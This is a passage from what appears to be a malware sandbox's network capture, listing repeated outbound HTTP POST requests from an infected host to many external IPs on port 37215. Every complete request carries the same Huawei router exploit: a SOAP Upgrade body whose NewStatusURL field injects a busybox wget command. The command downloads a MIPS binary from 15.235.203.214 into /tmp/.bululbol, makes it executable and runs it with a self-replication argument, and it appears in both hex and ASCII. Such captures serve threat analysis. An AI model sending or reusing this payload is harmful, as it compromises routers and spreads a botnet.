                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      64192.168.2.2347604197.178.33.22537215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221888065 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      65192.168.2.2351880132.70.95.6037215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221910000 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      66192.168.2.234982641.65.251.15837215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.221920967 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      67192.168.2.2335550168.165.233.14137215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.222007990 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      68192.168.2.2336512157.21.67.4937215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.222008944 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      69192.168.2.2358950197.71.207.15937215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.222028971 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      70192.168.2.2346562197.224.182.8337215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.222079992 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      71192.168.2.2341354197.93.123.7837215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.222090006 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      72192.168.2.2355906197.159.88.7937215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.222090960 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      73192.168.2.233876460.176.144.8037215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.222127914 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
